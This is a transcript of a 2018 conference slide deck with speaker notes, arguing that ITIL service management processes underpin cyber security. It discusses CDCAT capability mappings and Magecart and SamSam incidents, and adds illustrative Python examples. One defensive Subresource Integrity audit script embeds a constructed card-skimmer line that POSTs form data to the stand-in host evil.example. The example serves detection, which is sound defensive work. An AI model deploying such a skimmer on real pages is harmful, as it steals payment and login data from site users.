Martin Huddleston: No Service Management, No Security
- 1. 1
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
CYBER SECURITY
No Service Management,
No Cyber Security
20th November 2018
Martin Huddleston, Head of Cyber
CDCAT® is the registered trade mark of The Secretary of State for Defence, Dstl
- 2. 2
What we will cover
• The Service Management Risk Balance
• The Threat
• What Good Cyber Security Looks Like
• Analytics – Cyber Security through the Service Management Lens
• Real-world Case Studies of High-frequency-use Processes in Threat Prevention
• A Tangled Web
• What it means to be ‘Effective’, meeting appetite to take risk
• Digital Services Growth – Service Management Futures
• Takeaways
- 3. 3
Service Management Reminder – Risk Balance
• Resources
• Quality / Performance (including cyber security)
• Stakeholder interests
- 4. 4
Threat Actor Motivations, Means and Agility
Financial Fraud / Extortion
Resource Acquisition
Competitive IP Theft
Reputational Damage
Blackmail
State Sponsored Attacks
Social engineered attacks on the person / groups
Speed and agility in opportunities of the moment
Supply chain, 3rd party code and API security
Resource acquisition and parasitic processes
- 5. 5
Modern Day Dog-Fight – Attacker Lifecycle Elements
• Privilege Escalation
• Opportunity Identification
• Attacker DevSecOps
• Reconnaissance
• Initial Access
• Execution
• Persistence
• Defence Evasion
• Credential Access
• Discovery
• Lateral Movement
• Collection
• Exfiltration
• Command and Control
• Attack Assurance
- 6. 6
So What Does Good Cyber Security Look Like?
• Service Management Integrated Standard(s) & Frameworks
• Proportionate Performance to Impacts, Agile to Context and Appetite to Take Risk
• Per Asset and per Threat Performance
• Cyber Value and Effectiveness Measurable
- 7. 7
Good Cyber Security – 2009 ‘Conficker’ Impact
• UK MoD needed a means to assess its systems’ cyber defence preparedness
• MoD Chief Scientific Advisor asked Dstl to establish “what good looks like”
• Dstl could not find a suitable commercial product
• MOD / Dstl developed know-how to enable it to:
Systematically collect evidence
Make evidence-based investment decisions
Do this at pace and scale
CDCAT® is the registered trademark of The Secretary of State for Defence.
© Crown copyright, 2015; Crown Database Rights, 2015
- 8. 8
Integrated Control System for Cyber Security
• Operational Resilience
• 2 Lifecycles in Risk Balance: Cyber Defence; Service Management
• Multi-standard Support: 159 Capabilities, NATO*/MOD Derived; Protect / Defend / Operate satisfaction of ALL included standards
- 9. 9
Modern Day Dog-Fight – Defender Lifecycles / Phases
“Security is not merely a ‘state’ but a process that consists of 3 fundamental components: Protection, Detection and Reaction”
- Bob Ayers, US DoD, 1998
Service Management lifecycle:
• Strategy
• Design
• Transition (incl. DevSecOps)
• Operation
• Continual Improvement
Cyber Defence lifecycle:
• Assess*
• Deter
• Protect
• Detect
• Respond
• Recover
* Compared to US NIST Cyber Security Framework – Identify, Protect, Detect, Respond, Recover
- 11. 11
10 Steps to Cyber Security – Capability Count
[Figure: two bar charts, “10 Steps to Cyber Security” and “10 Steps – Excl. ITIL® V3”; x-axis Capability Order (by frequency rank, 1–101+), y-axis Capability Re-use Count (0–35)]
Top Four:
1) Define Security Configuration Baselines
2) Establish Policies to Secure Target System
3) Establish Policies to Secure Information
4) Identify Minimum System Security Requirements
Top Four Gaps (ITIL® V3 excluded):
1) Incident Management
2) Risk Management
3) Supplier Management
4) Service Asset & Configuration Management
- 12. 12
US NIST Cyber Security Framework – Capability Count
[Figure: two bar charts, “NIST CSF V1.1” and “NIST CSF V1.1 excl. ITIL V3”; x-axis Capability Order (by frequency rank, 1–131+), y-axis Capability Re-use Count (0–70)]
Top Four:
1) Information Security
2) Health Checks / Audits
3) Secure Data and Network Management
4) Accounting and Audit Controls
Top Four Gaps (ITIL V3 excluded):
1) Information Security
2) Incident Management
3) Supplier Management
4) Risk Management
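As an added illustration of the re-use counting behind these two slides (example code written for this page, not CDCAT or APMG tooling): a small Python script over a constructed control-to-capability mapping. The capability names are taken from the slides; the framework controls, the pairings and the resulting counts are made up, and the real CDCAT mappings are Crown copyright and not reproduced here. The script ranks capabilities by how many controls across the included standards re-use them, then ranks the ITIL V3 processes by how many non-ITIL controls depend on them, which is what the “gaps when ITIL is excluded” lists on the slides capture.

```python
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Constructed mapping: framework -> control -> capabilities the control relies on.
# Capability names come from the slides; the controls and pairings are
# illustrative and are NOT the real CDCAT mapping.
MAPPINGS: Dict[str, Dict[str, List[str]]] = {
    "10 Steps": {
        "Risk management regime": ["Risk Management", "Cyber Policy"],
        "Secure configuration": ["Define Security Configuration Baselines",
                                 "Service Asset & Configuration Management"],
        "Network security": ["Service Asset & Configuration Management",
                             "Define Security Configuration Baselines"],
        "Managing user privileges": ["Access Management",
                                     "Define Security Configuration Baselines"],
        "Malware prevention": ["Define Security Configuration Baselines"],
        "Removable media controls": ["Define Security Configuration Baselines"],
        "Incident management": ["Incident Management", "Event Management"],
    },
    "NIST CSF": {
        "ID.GV": ["Cyber Policy", "Risk Management"],
        "ID.RA": ["Risk Management"],
        "ID.SC": ["Supplier Management", "Risk Management"],
        "PR.IP": ["Define Security Configuration Baselines",
                  "Service Asset & Configuration Management"],
        "PR.PT": ["Define Security Configuration Baselines"],
        "DE.AE": ["Event Management", "Incident Management"],
        "RS.AN": ["Incident Management"],
        "RS.CO": ["Incident Management"],
        "RC.IM": ["Incident Management"],
    },
    # ITIL processes modelled as the provider of the capability of the same name.
    "ITIL V3": {
        "Incident Management": ["Incident Management"],
        "Risk Management": ["Risk Management"],
        "Supplier Management": ["Supplier Management"],
        "Service Asset & Configuration Management":
            ["Service Asset & Configuration Management"],
        "Event Management": ["Event Management"],
    },
}


def reuse_counts(mappings: Dict[str, Dict[str, List[str]]],
                 exclude: Iterable[str] = ()) -> Counter:
    """Number of controls, across the frameworks not in `exclude`, that map to
    each capability. A control listing a capability twice still counts once."""
    skip = set(exclude)
    counts: Counter = Counter()
    for framework, controls in mappings.items():
        if framework in skip:
            continue
        for capabilities in controls.values():
            counts.update(set(capabilities))
    return counts


def top_capabilities(mappings: Dict[str, Dict[str, List[str]]], n: int = 4,
                     exclude: Iterable[str] = ()) -> List[str]:
    """The n most re-used capabilities (highest count first, name breaks ties)."""
    counts = reuse_counts(mappings, exclude)
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [cap for cap, _ in ranked[:n]]


def dependency_gaps(mappings: Dict[str, Dict[str, List[str]]],
                    provider: str = "ITIL V3") -> List[Tuple[str, int]]:
    """Capabilities delivered by `provider`, ranked by how many controls in the
    other frameworks rely on them: what fails first if `provider` is not run well."""
    provided = {cap for caps in mappings[provider].values() for cap in caps}
    counts = reuse_counts(mappings, exclude=(provider,))
    ranked = [(cap, counts[cap]) for cap in provided]
    return sorted(ranked, key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    print("Top capabilities, all frameworks:", top_capabilities(MAPPINGS))
    print("Top capabilities, excl. ITIL V3: ", top_capabilities(MAPPINGS, exclude=("ITIL V3",)))
    for cap, n in dependency_gaps(MAPPINGS):
        print(f"{n:2d} non-ITIL controls depend on ITIL process: {cap}")
```

The second ranking is the one a service manager should read: a capability that many standards lean on but that is only delivered by an ITIL process is where a weak process silently voids several controls at once.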
- 13. 13
Poll of Top Service Management Capabilities - Impact
Magecart Incidents – Ticketmaster, British Airways et al.
Top ITIL® Capabilities:
• Supplier Management
• Service Asset & Configuration Management
• Incident Management
• Risk Management
- 14. 14
Poll of Top Service Management Capabilities - Impact
Facebook Incident
“This attack exploited the complex interaction of multiple issues in our code. It stemmed from a change we made to our video uploading feature in July 2017…hackers were using the site's API to automate the process of grabbing users' profile information”
Top ITIL® Capabilities:
• Supplier Management
• Service Asset & Configuration Management
• Incident Management
• Risk Management
- 15. 15
Poll of Top Service Management Capabilities - Impact
SamSam Incidents – Healthcare Sector
“Modus operandi is to gain access to an organization’s network, spend time performing reconnaissance by mapping out the network, before encrypting as many computers as possible and presenting the organization with a single ransom demand”
Top ITIL® Capabilities:
• Supplier Management
• Service Asset & Configuration Management
• Incident Management
• Risk Management
- 16. 16
Service Management in Complex System Risk – “A Tangled Web”
• Change language to Cyber Defence: not passive cyber security, but proactive defence.
• Increasing dependencies are a growing risk: with every new cyber security standard we are seeing greater complexity.
• A future is with us now: AI’s essential impact on service management, the complexity & scale issue.
• But not all good. A new class of problems and a new Service Management:
Prevent: keeping the AI weeds from choking the internet and digital services
Detect: cyber ‘bad’ actors weaponizing the AI weeds
Recover/Respond: cleaning up the AI weeds.
- 17. 17
Continual Improvement - Operational Risk Measurement e.g. Supply / Service Chain Security Effectiveness
[Figure: Overall Effectiveness with Maturity Levels]
These assets are individual systems / services that have had cyber defence assessment and effectiveness measurement calibrated to real-world performance data.
These allow you to decide a risk appetite and actions to accept, treat, transfer or avoid the risk as a portfolio.
- 18. 18
Control System Trends in Digital Services Growth
Leading to a changing face for Operational Resilience and Management of Harm
Ad hoc
Passive: Process Quality, Only Compliance Driven
Reactive: BC & DR, Response & Recovery Driven
Proactive: Intelligence, Analytics & Agility Driven
Autonomic: Self Healing, re-Provisioning, After-care
- 19. 19
Takeaways
1. Service Managers can “step up” to secure networks; effective security is a ‘team’ sport. Consider your high-frequency processes first.
2. The need for more operational testing, SIAM*, DevSecOps and testing of complex systems is inevitable. Consider your ‘Release and Deployment’ processes.
3. Baseline your current maturity effectiveness to empower your business conversations in valuing cyber risk. Quantify it with the business exposure.
*SIAM – Service Integration and Management
- 21. 21
+44 (0) 1494 452450
servicedesk@apmgroupltd.com
linkedin.com/company/apm-group
apmg-international.com
@Cyber_APMG @APMG_Inter
facebook.com/APMGinternationalLTD
Keeping in touch
© APMG International Ltd. 2018. All rights reserved.
Editor's Notes
- No service management No cyber security
Cyber Security is no different from any other management activity: the theory is straightforward and well known, execution is very difficult. Research carried out by a joint UK/US team identified that one key element of high-quality cyber security is world-class service management, as the majority of controls used to secure a system lie within the service management realm. Martin will outline the background to the research and share the results that identify how service management controls fit within a cyber security life cycle. Building on this work, Martin will show how we need to think more about effectiveness and continuous improvement rather than compliance to give us the best chance of staying ahead of the attackers.
Plan
Assume people know what service management is (the 3-legged stool) and what cyber security is in terms of operational resilience: maturity enables agile defence, agile operations and agile resource prioritisation; raising process and performance maturity is what makes it possible to be agile and to perform.
What makes cyber security execution difficult? [Threat agility: the attacker has to be right once, the defence right every time] [Failure of protection, resort to resilience/recovery] [Evolution of systems / defences]
NATO / MOD background, maturity models for agility.
What is high-quality cyber security and what role is service management playing: heat map/statistics/re-use.
Demonstrate how service management controls fit in the cyber security lifecycle. [iData CPNI/NCSC kill chain, ATT&CK steps/lifecycle, A/D/P/D/R/R]
Effectiveness & continual improvement (noting ISO 20000-1:2018 has dropped CSI), agility to stay ahead of attackers, DevSecOps [re recent UK/US/Canada air force investments in agile process] [coding securely at pace] [issue for GitHub’s and Red Hat’s new owners re open source]
- Service Management Reminder
Threats, Threat Agility
What does good look like in Cyber Security
- Financial Fraud/Extortion, Resource Acquisition, Competitive IP Theft, Reputational Damage, Black-mail, State Sponsored Attacks…
NCSC: Sept Threat brief on Supply Chain . NCSC is developing its approach to this issue and stated in October 2018 that the risk in the supply chain is:-
• An increase in pace and number of cyber security incidents
• No increase in severity
• Vulnerabilities are old and can be patched
• Attacks do not require use of high-end skills
• Supply chain at risk, with suppliers being the first source of the compromise.
NCSC’s approach also recommends:-
• Promoting cloud-based hosting technology for the vast majority of users
• To change the focus from sites to systems
• Exploring models for examining and recording cyber security of common suppliers
• Promoting NIS across all CNI sectors (not just ones regulated by NIS) and major businesses to improve security in the supply chain
• Piloting a new Active Cyber Defence “Supplier Check” inspection of external web site as proxy for internal cyber posture.
Current ‘Live’ Means Used by Attackers
Social engineered attacks on the person
e.g. Phishing, Vishing, Whaling, etc.
Speed and agility
e.g. opportunistic ransomware, machine-to-machine network exploitation – SamSam, WannaCry, etc.
Supply chain and sources of code and API security
e.g. CCleaner, Magecart (Ticketmaster, BA et al.), Facebook, etc.
Resource acquisition in parasitic processes
e.g. DDoS bots, crypto mining, scam hosting
https://duo.com/decipher/magecart-group-refines-attacks-nabs-more-sites
Much of Magecart’s previous attacks focused on compromising third-party providers. The group would inject its malicious code into libraries and scripts provided by third-party providers, thus ensuring that any website using that provider’s code would be executing the attack code. For example, Magecart has targeted websites running outdated and unpatched versions of Magento, an open-source ecommerce platform written in PHP. Recent figures suggest that over 7,300 stores have been affected by the MagentoCore card skimming code.
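The defensive counterpart to the Magecart pattern just described, as an added example for this page (not code from the original deck, from NCSC, Duo or any of the affected sites): put the third-party scripts a page loads under configuration control. The Python below keeps a baseline of approved script hashes, audits what a monitoring job fetched against that baseline, and pins approved scripts with Subresource Integrity so the browser refuses a body that has drifted. The page fragment, the hostnames (`cdn.example.net`, `tags.third-party.example`, `evil.example`) and the script bodies, including the appended skimmer, are all constructed for the example.

```python
import base64
import hashlib
import re
from typing import Dict

# --- constructed inputs: not real sites, not real scripts ---
# The template the web server renders. The third-party tag is the kind of
# supplier dependency Magecart has abused.
PAGE_HTML = """<html><body>
<script src="https://cdn.example.net/lib/checkout.js"></script>
<script src="https://tags.third-party.example/tag.js"></script>
<script src="https://cdn.example.net/lib/vendor.js"></script>
</body></html>"""

# Script bodies as approved when they were added to the configuration baseline.
APPROVED: Dict[str, bytes] = {
    "https://cdn.example.net/lib/checkout.js": b"function checkout(f){return post('/pay', f);}",
    "https://tags.third-party.example/tag.js": b"window.track=function(e){beacon(e)};",
}

# What a monitoring job fetched today. tag.js has had a skimmer appended
# (a constructed stand-in for an injected card-stealing payload) and
# vendor.js was never put through change control.
FETCHED_NOW: Dict[str, bytes] = {
    "https://cdn.example.net/lib/checkout.js": APPROVED["https://cdn.example.net/lib/checkout.js"],
    "https://tags.third-party.example/tag.js": APPROVED["https://tags.third-party.example/tag.js"]
        + b"document.forms[0].onsubmit=function(){fetch('https://evil.example/c',"
          b"{method:'POST',body:new FormData(this)})};",
    "https://cdn.example.net/lib/vendor.js": b"var vendor={};",
}

SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc="([^"]+)"[^>]*>', re.IGNORECASE)


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value for a script body: sha256-<base64 digest>."""
    return "sha256-" + base64.b64encode(hashlib.sha256(content).digest()).decode()


def build_baseline(approved: Dict[str, bytes]) -> Dict[str, str]:
    """The configuration baseline: approved script URL -> approved SRI hash."""
    return {src: sri_hash(body) for src, body in approved.items()}


def audit_page(html: str, fetched: Dict[str, bytes], baseline: Dict[str, str]) -> Dict[str, str]:
    """Classify every script the page loads against the baseline:
    ok / modified / unapproved / unreachable, plus not-loaded for baseline
    entries the page no longer references."""
    result: Dict[str, str] = {}
    for src in SCRIPT_SRC.findall(html):
        if src not in baseline:
            result[src] = "unapproved"
        elif src not in fetched:
            result[src] = "unreachable"
        elif sri_hash(fetched[src]) != baseline[src]:
            result[src] = "modified"
        else:
            result[src] = "ok"
    for src in baseline:
        result.setdefault(src, "not-loaded")
    return result


def add_sri(html: str, baseline: Dict[str, str]) -> str:
    """Pin each approved script with integrity + crossorigin so the browser
    refuses to execute a body whose hash no longer matches the baseline."""
    def pin(match: "re.Match[str]") -> str:
        tag, src = match.group(0), match.group(1)
        if src in baseline and "integrity=" not in tag:
            return tag[:-1] + f' integrity="{baseline[src]}" crossorigin="anonymous">'
        return tag
    return SCRIPT_SRC.sub(pin, html)


if __name__ == "__main__":
    baseline = build_baseline(APPROVED)
    for src, status in audit_page(PAGE_HTML, FETCHED_NOW, baseline).items():
        print(f"{status:10s} {src}")
    print(add_sri(PAGE_HTML, baseline))
```

A skimmer injected into a supplier's script, as in the Magecart cases, changes the hash: the audit reports it as `modified`, and a browser given the pinned tag refuses to run it. The `unapproved` result is the Service Asset & Configuration Management failure in miniature, a script in production that never went through change control. SRI only works when the supplier serves a fixed file; a tag that updates itself needs a different control, such as a locally hosted, reviewed copy.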
- Unseen, performing, cost effective: sounds like service management. Compliance is not enough. How high the bar? What performance and what effectiveness? What agility? Changing the bar: anticipating the threats / vulnerabilities, continual optimisation, ATT&CK / intel. Automation, commoditisation, cloud, utility security: just a characteristic of a digital service, a feature of service & service management.
Like any athlete the organisation needs to perform, every time, which is hard; sustaining performance is all about service management, including delivering agile services, where the service is cyber security.
What it is not is conformance to ISO/IEC 27001 or ISO/IEC 20000-1 or any ‘compliance’ standard.
It is much more than process in the sense of process quality improvement.
Sustaining outcomes, sustaining and adapting, optimising to the dynamic: more than People, Process, Technology. Sustaining is about TEPIDOIL (Training, Equipment, Personnel, Information, Doctrine, Organisation, Infrastructure, Logistics) and leadership. Don’t conflate ‘governance’ with ‘performance’: operational agility is hard, but service management has always sought to deliver it.
3-legged stool of balancing stakeholders, resources and performance/quality/output. We know there are never enough resources, not just for security; resources and prioritisation are the order of the day.
Performance vs compliance: visualise the high jump, but how high the bar?
- Background: ‘Time Based Security’ book by Winn Schwartau; Bob Ayers, Director of the DoD Information Systems Security Program, and team at US DoD DISA, circa 1997: Protection > Detection + Reaction. ‘Risk avoidance’ cultures are doomed to failure. Security risk cannot be designed out.
- 5 basic cyber controls that everyone should adhere to
Boundary firewalls and internet gateways
Secure configuration
Access control
Malware protection
Patch management
Top 5 Capabilities by Frequency:
Define Security Configuration Baselines
Establish Policies to Secure Target System
Establish Policies to Secure Information
Identify Minimum System Security Requirements
Secure Data and Network Management
Top 6 Capabilities used for ITIL V3 Delivery
Incident Management
Risk Management
Supplier Management
Service Asset & Configuration Management
Cyber Policy
Event Management
-
Top 5 Capabilities by frequency:
Information Security
Health Checks / Audits
Secure Data and Network Management
Accounting and Audit Controls
Incident Management
Top 6 ITIL V3 Capabilities excluded:
Information Security
Incident Management
Supplier Management
Risk Management
Service Continuity Plan
Metrics / Improvement Opportunity Identification
- https://duo.com/decipher/magecart-group-refines-attacks-nabs-more-sites
https://www.zdnet.com/article/british-airways-cyberattack-data-theft-bigger-than-we-first-thought/
10 Steps:
Incident Management
Risk Management
Supplier Management
Service Asset & Configuration Management
Cyber Policy
Event Management
ASD:
Service Asset & Configuration Management 2
Change Management
Event Management
Incident Management 2
Release and Deployment Management
Risk Management 2
NIST:
Information Security
Incident Management 3
Supplier Management 2
Risk Management 3
Service Continuity Plan
Metrics / Improvement Opportunity Identification
Aggregate:
Cyber Policy 2
Information Security 2
Cyber Strategy
Metrics / Improvement Opportunity Identification
Risk Management 4
Access Management
- Change language to Cyber Defence: not passive cyber security, but proactive defence.
Increasing dependencies are a growing risk.
With every new cyber security standard we are seeing greater complexity/dependencies.
Statistics on complexity, i.e. growth in the number of mappings per capability, would be a strong indicator of the fundamental need for automation in capability interactions.
Could conclude from this why SM, and SIAM in particular, remains and will grow in importance.
A future with us now in a tangled web:
AI’s growing and essential impact on service management, the complexity & scale issue.
But not all good, a new class of problems:
Prevent: keeping the AI weeds from choking the internet and digital services
Detect: preventing cyber ‘bad’ actors from weaponizing the AI weeds
Recover/Respond: cleaning up the AI weeds.
https://www.weforum.org/reports/the-global-risks-report-2018
A Tangled Web
Artificial intelligence “weeds” proliferate, choking off the performance of the internet
What if the adverse impact of artificial intelligence (AI) involves not a super-intelligence that takes control from humans but “AI weeds”—low-level algorithms that slowly choke off the internet? Algorithms are already proliferating. As they increase in sophistication—as we become more reliant on code that writes code, for example—explosive growth becomes more likely. A divergence could open between the code we have created and our capacity to track and control it.
The tragedy of the commons means we often let chronic problems with dispersed responsibilities fester. Think of plastic in the ocean. A trend towards reduced internet efficiency would undermine service delivery in countless businesses. It could hobble the Internet of Things. It would frustrate users. If the problem became significant enough, it could prompt some governments to wall off parts of the internet. If malicious actors found ways to proliferate or weaponize the AI weeds, they could do extensive damage.
As the global demands placed on the internet increase in scale and sophistication, digital hygiene is likely to become a more pressing concern for end-users. The development of overarching norms, regulations and governance structures for AI will be crucial: without a robust and enforceable regulatory framework, there is a risk that humans will in effect be crowded out from the internet by the proliferation of AI.
Service Management or Cyber Security, or does it matter, just Secure Digital SM?
- Aggregate analysis to assess whether appetite to take risk is being applied uniformly and, if systems are connected, whether risk is being appropriately managed: e.g. is system M connected to system N, in which case system effectiveness might be that of M not N.
This diagram is currently not routinely produced by CDCAT but by subsequent consultancy.
Discuss continual maturity improvement: the road to effectiveness is about sustaining high performance against agile attackers to make it hard for them so they try elsewhere. Capability improvement is about knowing where to invest to get the most bang for buck; take for example the 4 ITIL processes identified.
In a world of cloud services and extended APIs down an opaque supply or service chain, where attackers can live off the land of the slightest configuration mismatch, exploiting emergent behaviour, then to know the capability maturity and quantify the effectiveness calibrated to an absolute scale is to instil trust and/or decide what risk measures are needed from the business perspective. E.g. to take out appropriate cyber insurance, but understand that insurers rightly place obligations on you to be mature in your resilience operation: a partnership in financial mitigations.
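An added worked example of the aggregate view described in this note (illustrative Python written for this page, not CDCAT’s method or output): a small dependency graph over a constructed portfolio. It assumes that connected systems share the effectiveness of the weakest among them, so a strong system N connected to a weak system M is assessed at M’s level, and it applies one risk appetite uniformly across the portfolio to separate what can be accepted from what needs treating. The scores, the 0–100 scale and the connections are made up.

```python
from collections import deque
from typing import Dict, List, Set, Tuple

# Constructed portfolio. Scores are on an assumed 0-100 effectiveness scale and
# connections are assumed to be bidirectional trust/network links; none of
# this is CDCAT output.
EFFECTIVENESS: Dict[str, int] = {"M": 45, "N": 85, "P": 70, "Q": 90, "R": 60}
CONNECTIONS: List[Tuple[str, str]] = [("M", "N"), ("N", "P"), ("Q", "R")]


def adjacency_of(edges: List[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """Undirected adjacency list: a link exposes both ends to each other."""
    adjacency: Dict[str, Set[str]] = {}
    for a, b in edges:
        adjacency.setdefault(a, set()).add(b)
        adjacency.setdefault(b, set()).add(a)
    return adjacency


def connected_systems(start: str, adjacency: Dict[str, Set[str]]) -> Set[str]:
    """Every system reachable from `start`, including itself (breadth-first)."""
    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in adjacency.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def effective_scores(scores: Dict[str, int],
                     edges: List[Tuple[str, str]]) -> Dict[str, Tuple[int, str]]:
    """Assumption used here: a system is only as effective as the weakest
    system it is connected to, directly or transitively.
    Returns name -> (effective score, name of the weakest connected system)."""
    adjacency = adjacency_of(edges)
    result: Dict[str, Tuple[int, str]] = {}
    for name in scores:
        group = connected_systems(name, adjacency)
        weakest = min(group, key=lambda n: (scores[n], n))
        result[name] = (scores[weakest], weakest)
    return result


def portfolio_decisions(scores: Dict[str, int], edges: List[Tuple[str, str]],
                        appetite: int) -> Dict[str, str]:
    """Apply one appetite uniformly across the portfolio. A system that clears
    the bar on its own but fails through a connection is flagged with the
    culprit: the "M connected to N" case from the notes."""
    decisions: Dict[str, str] = {}
    for name, (effective, weakest) in effective_scores(scores, edges).items():
        if effective >= appetite:
            decisions[name] = "accept"
        elif scores[name] < appetite:
            decisions[name] = "treat: own effectiveness below appetite"
        else:
            decisions[name] = f"treat: inherits {effective} from {weakest}"
    return decisions


if __name__ == "__main__":
    for system, decision in portfolio_decisions(EFFECTIVENESS, CONNECTIONS, appetite=55).items():
        print(f"{system}: own {EFFECTIVENESS[system]:3d} -> {decision}")
```

With an appetite of 55, Q and R are accepted, M needs treating on its own account, and N and P, both well above the bar in isolation, are pulled down to 45 by their connection to M. Treating M once lifts all three, which is the “where to invest for the most bang for buck” reading of the portfolio.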
- Reasons to be proactive:
Money
Reputation
Livelihood
Safety
Survival
Explain resilience and the stress induced by cyber: the conflict of maturity levels, where agile tends to Level 2 ‘Developing’ whilst cyber security tends to Level 4 ‘Manage outcomes by metrics’. Future business architectures ‘build this in’ by design, at a cost compensated for by future benefits, i.e. the opportunity. Security and proactive resilience aren’t free. Business evolution and resilience are evolving to change what is ‘normal’ in business design.
Aim is now to provide a framework and risk analysis system that supports the agility needed
Discuss the status of regulators approach to harm and expectations on managing risk in financial service.
Discuss the state of the art in autonomics, e.g. telecoms 5G and zero-touch provisioning, and the role of service management in carrier-grade service delivery, including security effectiveness to better than five-nines availability. Right almost every time: the means to digitally secure systems in the face of human fallibility and the inevitable misconfigurations of complex services.
Influence of 5G autonomic technologies, e.g. zero-touch provisioning.
Forensics: Premera Blue Cross breach, data destruction
https://www.zdnet.com/article/premera-blue-cross-accused-of-destroying-evidence-in-data-breach-lawsuit/ See also SANS NewsBites Vol. 20 Num. 070 (California Establishes Election Cybersecurity Office; Five Eyes Want to Access Encrypted Communications; California Approves Net Neutrality Bill) for the commentary. [CDCAT Q2: CDCAT Application: Capabilities folder]. Recovery operations need to forensically archive data/equipment to meet legal duties of care.
Automation: CENX/Ericsson closed-loop control and 5G
CDCAT levels 3, 4, 5: automated control identification. Predicting where it will be needed next via the mapping is a process of process design to achieve cyber defence, using IA, CNO and SM.
https://www.fiercetelecom.com/telecom/ericsson-boosts-closed-loop-automation-capabilities-deal-to-buy-cenx is an example of where that automation is bubbling up.
- Service Managers can and need to “step up” to secure networks. Good cyber security is dependent on good service management; effective security is a “team sport”: automate for repeatable outcomes and get to grips with configuration risk.
Most breaches are due to insider issues [in fact, historically, human error and misconfiguration; ref. Verizon DBIR] – hence the need for more testing and DevSecOps. Compliance alone means accepting successful attacks.
Baseline your current maturity effectiveness and empower your business conversations on the value of cyber risk; quantify it using real-world calibration. Maturity of implementation is the only way to effective security.